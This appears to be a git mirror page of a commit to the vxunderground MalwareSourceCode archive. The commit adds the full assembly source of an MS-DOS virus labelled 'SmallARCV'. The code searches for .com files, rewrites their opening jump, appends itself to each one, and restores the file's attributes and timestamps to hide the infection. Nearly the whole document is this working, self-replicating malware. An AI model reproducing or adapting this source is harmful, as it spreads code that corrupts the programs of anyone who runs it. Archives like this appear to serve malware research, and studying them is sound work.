daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:31:39 -06:00
committed by GitHub
parent 039994e413
commit d3381d8e02
99 changed files with 39953 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.arcvsmal.asm
+138
View File
@@ -0,0 +1,138 @@
.radix 16
.model tiny
.code
org 100h
main:
jmp start
start:
call get_pointer ;>>xref=<06106><<
get_pointer:
pop bp ; pop cs:ip of stack
sub bp,offset get_pointer ; adjust
lea si,word ptr [bp+old_jump]; loc of old jump
mov di,0100h ; where to put it
push di ; save on stack for later return
movsw
movsb
mov ah,1ah ; set DTA
lea dx,word ptr ss:d061ef[bp] ;
int 21h
lea dx,[bp+com_file] ; COM filespec
mov ah,4eh ; find first file
mov cx,0007h ; all attributes
find_loop:
int 21h ;
jb set_dta ; none found then jump.
call open_file ; open the file
mov ah,3fh ; read from file
lea dx,word ptr ss:d0621a[bp] ; store here
mov cx,001ah ; number of bytes
int 21h
mov ah,3eh ; close the file
int 21h
mov ax,word ptr ss:d06209[bp] ; get file siz
cmp ax,0feceh ; cmp to 65k.
ja find_next ; to big then forget it.
mov bx,word ptr ss:d0621b[bp] ; get jump loc in file
add bx,00efh ; add virus size
cmp ax,bx ; does it equal file size?
jne infect_com ; nope then get file
find_next:
mov ah,4fh ; find next file
jmp short find_loop
set_dta:
mov ah,1ah ; set dta
mov dx,80h ; to original position
int 21h
ret
old_jump:
int 20h ; original jump
db 00 ; original file so its an int 20h.
set_attribute:
mov ax,4301h ; set file attr.
lea dx,word ptr ss:d0620d[bp] ; filename
int 21h ; cl has attribs
ret
sig db '[SmallARCV]',0
db 'Apache Warrior.',0
com_file db '*.com',0 ; com filespec
open_file:
mov ax,3d02h ; open file read/write
lea dx,word ptr ss:d0620d[bp] ; location of filename
int 21h
xchg ax,bx ; handle -> bx
ret
infect_com:
mov cx,0003h ; # of bytes to write
sub ax,cx ; adjust filesize for jmp.
lea si,word ptr ss:d0621a[bp] ; victims original jmp
lea di,word ptr old_jump[bp] ; place here
movsw ; move it
movsb
mov byte ptr [si-03],0e9h ; set up new jump
mov word ptr [si-02],ax ; and save it
push cx ; save # of bytes to write
xor cx,cx ; clear attributes
call set_attribute ; set attributes
call open_file ; open file
mov ah,40h ; write to file
lea dx,word ptr ss:d0621a[bp] ; new jump
pop cx ; get bytes off stack
int 21h
mov ax,4202h ; move fpointer to end
xor cx,cx ; clear these
cwd ; clear dx
int 21h
mov ah,40h ; write to file
lea dx,word ptr start[bp] ; from here.
mov cx,00ech ; size of virus
int 21h
mov ax,5701h ; set files date/time back
mov cx,word ptr ss:d06205[bp] ;
mov dx,word ptr ss:d06207[bp] ;
int 21h
mov ah,3eh ; close file
int 21h
mov ch,00 ; set attributes back
mov cl,byte ptr ss:d06204[bp] ; original attribs.
call set_attribute ; set them back
jmp set_dta ; jump and quit virus.
d061ef equ 001efh
d06204 equ 00204h
d06205 equ 00205h
d06207 equ 00207h
d06209 equ 00209h
d0620d equ 0020dh
d0621a equ 0021ah
d0621b equ 0021bh
end main